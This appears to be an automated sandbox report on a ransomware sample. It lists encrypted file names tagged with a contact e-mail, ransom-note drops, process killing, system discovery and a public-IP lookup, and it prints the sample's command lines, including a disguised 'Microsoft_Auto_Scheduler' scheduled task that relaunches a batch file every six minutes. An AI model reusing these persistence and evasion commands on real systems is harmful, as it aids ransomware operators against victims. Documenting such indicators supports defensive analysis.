File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-ppd.xrm-ms	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\offlineStrings.js	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-white\MedTile.scale-100.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\MSOSEC.DLL	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\tet\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-100.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lv\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\ui-strings.js[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial-ppd.xrm-ms[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\informix.xsl[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R32.dll[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-48_altform-lightunplated.png	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\fr-FR\MSFT_PackageManagement.schema.mfl	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\ja-JP\msdaremr.dll.mui	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\LAYERS.INF	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Offline\Read_Me!_.txt	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\ui-strings.js[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\BLUEPRNT.ELM[ID=6qxipe-Mail=FreedomTeam@mail.ee].60iJ	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Drops file in Windows directory 2 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
File created	C:\Windows\Pagesfilo.sys	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
File opened for modification	C:\Windows\Pagesfilo.sys	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2228 schtasks.exe

pid	process
2228	schtasks.exe

Delays execution with timeout.exe 10 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2400	timeout.exe
1728	timeout.exe
4180	timeout.exe
3348	timeout.exe
4636	timeout.exe
1920	timeout.exe
4500	timeout.exe
5036	timeout.exe
4648	timeout.exe
4204	timeout.exe

Enumerates processes with tasklist 1 TTPs 11 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
4524	tasklist.exe
3500	tasklist.exe
3912	tasklist.exe
2168	tasklist.exe
4980	tasklist.exe
2116	tasklist.exe
944	tasklist.exe
3428	tasklist.exe
3900	tasklist.exe
3344	tasklist.exe
3808	tasklist.exe

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

3940 systeminfo.exe
4272 systeminfo.exe

pid	process
3940	systeminfo.exe
4272	systeminfo.exe

Kills process with taskkill 39 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4956	taskkill.exe
2240	taskkill.exe
3000	taskkill.exe
4872	taskkill.exe
4080	taskkill.exe
2164	taskkill.exe
2144	taskkill.exe
4900	taskkill.exe
3852	taskkill.exe
2684	taskkill.exe
2764	taskkill.exe
4280	taskkill.exe
2092	taskkill.exe
2008	taskkill.exe
4660	taskkill.exe
4520	taskkill.exe
2708	taskkill.exe
3968	taskkill.exe
3900	taskkill.exe
4516	taskkill.exe
4524	taskkill.exe
4076	taskkill.exe
4312	taskkill.exe
3120	taskkill.exe
2604	taskkill.exe
3812	taskkill.exe
4360	taskkill.exe
624	taskkill.exe
4932	taskkill.exe
4084	taskkill.exe
2408	taskkill.exe
1004	taskkill.exe
4536	taskkill.exe
1924	taskkill.exe
4208	taskkill.exe
2472	taskkill.exe
2992	taskkill.exe
536	taskkill.exe
3128	taskkill.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings cmd.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2384 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

tasklist.exetasklist.exe

pid process

3428 tasklist.exe
3428 tasklist.exe
4524 tasklist.exe
4524 tasklist.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

pid process

2856 e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	cmd.exe

pid	process
2384	reg.exe

pid	process
3428	tasklist.exe
3428	tasklist.exe
4524	tasklist.exe
4524	tasklist.exe

pid	process
2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3428	tasklist.exe
Token: SeDebugPrivilege	4524	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2400	WMIC.exe
Token: SeSecurityPrivilege	2400	WMIC.exe
Token: SeTakeOwnershipPrivilege	2400	WMIC.exe
Token: SeLoadDriverPrivilege	2400	WMIC.exe
Token: SeSystemProfilePrivilege	2400	WMIC.exe
Token: SeSystemtimePrivilege	2400	WMIC.exe
Token: SeProfSingleProcessPrivilege	2400	WMIC.exe
Token: SeIncBasePriorityPrivilege	2400	WMIC.exe
Token: SeCreatePagefilePrivilege	2400	WMIC.exe
Token: SeBackupPrivilege	2400	WMIC.exe
Token: SeRestorePrivilege	2400	WMIC.exe
Token: SeShutdownPrivilege	2400	WMIC.exe
Token: SeDebugPrivilege	2400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2400	WMIC.exe
Token: SeRemoteShutdownPrivilege	2400	WMIC.exe
Token: SeUndockPrivilege	2400	WMIC.exe
Token: SeManageVolumePrivilege	2400	WMIC.exe
Token: 33	2400	WMIC.exe
Token: 34	2400	WMIC.exe
Token: 35	2400	WMIC.exe
Token: 36	2400	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2400	WMIC.exe
Token: SeSecurityPrivilege	2400	WMIC.exe
Token: SeTakeOwnershipPrivilege	2400	WMIC.exe
Token: SeLoadDriverPrivilege	2400	WMIC.exe
Token: SeSystemProfilePrivilege	2400	WMIC.exe
Token: SeSystemtimePrivilege	2400	WMIC.exe
Token: SeProfSingleProcessPrivilege	2400	WMIC.exe
Token: SeIncBasePriorityPrivilege	2400	WMIC.exe
Token: SeCreatePagefilePrivilege	2400	WMIC.exe
Token: SeBackupPrivilege	2400	WMIC.exe
Token: SeRestorePrivilege	2400	WMIC.exe
Token: SeShutdownPrivilege	2400	WMIC.exe
Token: SeDebugPrivilege	2400	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2400	WMIC.exe
Token: SeRemoteShutdownPrivilege	2400	WMIC.exe
Token: SeUndockPrivilege	2400	WMIC.exe
Token: SeManageVolumePrivilege	2400	WMIC.exe
Token: 33	2400	WMIC.exe
Token: 34	2400	WMIC.exe
Token: 35	2400	WMIC.exe
Token: 36	2400	WMIC.exe
Token: SeBackupPrivilege	2036	vssvc.exe
Token: SeRestorePrivilege	2036	vssvc.exe
Token: SeAuditPrivilege	2036	vssvc.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	3900	taskkill.exe
Token: SeDebugPrivilege	3500	tasklist.exe
Token: SeDebugPrivilege	4280	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	4872	taskkill.exe
Token: SeDebugPrivilege	4208	taskkill.exe
Token: SeDebugPrivilege	2092	taskkill.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeDebugPrivilege	4080	taskkill.exe
Token: SeDebugPrivilege	4084	taskkill.exe
Token: SeDebugPrivilege	2164	taskkill.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	4524	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	3812	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.execmd.execmd.execmd.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2856 wrote to memory of 4012	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4012	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4012	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 4012 wrote to memory of 3428	4012	cmd.exe	tasklist.exe
PID 4012 wrote to memory of 3428	4012	cmd.exe	tasklist.exe
PID 4012 wrote to memory of 3428	4012	cmd.exe	tasklist.exe
PID 4012 wrote to memory of 2876	4012	cmd.exe	findstr.exe
PID 4012 wrote to memory of 2876	4012	cmd.exe	findstr.exe
PID 4012 wrote to memory of 2876	4012	cmd.exe	findstr.exe
PID 2856 wrote to memory of 4240	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4240	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4240	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4296	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4296	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4296	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 4296 wrote to memory of 2040	4296	cmd.exe	WScript.exe
PID 4296 wrote to memory of 2040	4296	cmd.exe	WScript.exe
PID 4296 wrote to memory of 2040	4296	cmd.exe	WScript.exe
PID 2856 wrote to memory of 2152	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 2152	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 2152	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2152 wrote to memory of 2228	2152	cmd.exe	schtasks.exe
PID 2152 wrote to memory of 2228	2152	cmd.exe	schtasks.exe
PID 2152 wrote to memory of 2228	2152	cmd.exe	schtasks.exe
PID 2040 wrote to memory of 3856	2040	WScript.exe	cmd.exe
PID 2040 wrote to memory of 3856	2040	WScript.exe	cmd.exe
PID 2040 wrote to memory of 3856	2040	WScript.exe	cmd.exe
PID 2856 wrote to memory of 2376	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 2376	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 2376	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2040 wrote to memory of 1476	2040	WScript.exe	cmd.exe
PID 2040 wrote to memory of 1476	2040	WScript.exe	cmd.exe
PID 2040 wrote to memory of 1476	2040	WScript.exe	cmd.exe
PID 2856 wrote to memory of 2232	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 2232	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 2232	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2232 wrote to memory of 3940	2232	cmd.exe	systeminfo.exe
PID 2232 wrote to memory of 3940	2232	cmd.exe	systeminfo.exe
PID 2232 wrote to memory of 3940	2232	cmd.exe	systeminfo.exe
PID 2232 wrote to memory of 4532	2232	cmd.exe	find.exe
PID 2232 wrote to memory of 4532	2232	cmd.exe	find.exe
PID 2232 wrote to memory of 4532	2232	cmd.exe	find.exe
PID 1476 wrote to memory of 4524	1476	cmd.exe	tasklist.exe
PID 1476 wrote to memory of 4524	1476	cmd.exe	tasklist.exe
PID 1476 wrote to memory of 4524	1476	cmd.exe	tasklist.exe
PID 1476 wrote to memory of 4444	1476	cmd.exe	find.exe
PID 1476 wrote to memory of 4444	1476	cmd.exe	find.exe
PID 1476 wrote to memory of 4444	1476	cmd.exe	find.exe
PID 1476 wrote to memory of 3348	1476	cmd.exe	timeout.exe
PID 1476 wrote to memory of 3348	1476	cmd.exe	timeout.exe
PID 1476 wrote to memory of 3348	1476	cmd.exe	timeout.exe
PID 2856 wrote to memory of 4984	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4984	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 4984	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 4984 wrote to memory of 4272	4984	cmd.exe	systeminfo.exe
PID 4984 wrote to memory of 4272	4984	cmd.exe	systeminfo.exe
PID 4984 wrote to memory of 4272	4984	cmd.exe	systeminfo.exe
PID 4984 wrote to memory of 5080	4984	cmd.exe	find.exe
PID 4984 wrote to memory of 5080	4984	cmd.exe	find.exe
PID 4984 wrote to memory of 5080	4984	cmd.exe	find.exe
PID 2856 wrote to memory of 1536	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 1536	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 1536	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe
PID 2856 wrote to memory of 1832	2856	e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe
"C:\Users\Admin\AppData\Local\Temp\e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
2⤵
- Suspicious use of WriteProcessMemory
PID:4012

C:\Windows\SysWOW64\tasklist.exe
tasklist /v /fo csv
3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3428

C:\Windows\SysWOW64\findstr.exe
findstr /i "dcdcf"
3⤵
PID:2876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ver
2⤵
PID:4240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4296

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
4⤵
PID:3856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\tasklist.exe
tasklist /v
5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\SysWOW64\find.exe
find /I /c "dcdcf"
5⤵
PID:4444

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:3348

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:4200

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:4204

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:3900

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:1928

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:4636

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:3912

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:8

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1920

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:2168

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:4400

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:4500

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:3344

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:3632

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:2400

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:4980

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:3464

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:5036

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:3808

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:4864

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:4648

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:2116

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:3908

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1728

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:944

C:\Windows\SysWOW64\find.exe
find /I "e7927efd913a50c9d5885f2b39bbcfba576e1ecafa5679c58a0f613653c6651f.exe"
5⤵
PID:512

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:4180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
3⤵
- Creates scheduled task(s)
PID:2228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo %date%-%time%
2⤵
PID:2376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
2⤵
- Suspicious use of WriteProcessMemory
PID:2232

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:3940

C:\Windows\SysWOW64\find.exe
find /i "os name"
3⤵
PID:4532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
2⤵
- Suspicious use of WriteProcessMemory
PID:4984

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:4272

C:\Windows\SysWOW64\find.exe
find /i "original"
3⤵
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ver
2⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
2⤵
PID:1832

C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
3⤵
PID:852

C:\Windows\SysWOW64\cmd.exe
